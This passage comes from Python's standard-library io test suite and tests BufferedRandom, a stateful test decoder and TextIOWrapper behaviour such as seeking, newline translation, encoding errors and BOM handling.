BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
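# seek() whence values: 0 = absolute, 1 = relative to the current position,
# 2 = relative to the end of the stream.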
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
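# For example, with the initial settings I=1 and O=1, the input b'abcd'
# decodes to 'a.b.c.d.' (see the test cases in
# StatefulIncrementalDecoderTest below).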
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated (variable-length mode).
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
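# Reverse of getstate(): the integer packs i and o as i*100 + o (hence the
# 99 cap on both), and the XOR undoes the flag trick used there.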
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check that the encoding attribute is always set and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make the test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
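# With buffering=1 (line buffering) each thread writes one complete line;
# after all threads have run, every line must appear exactly once in the file.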
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
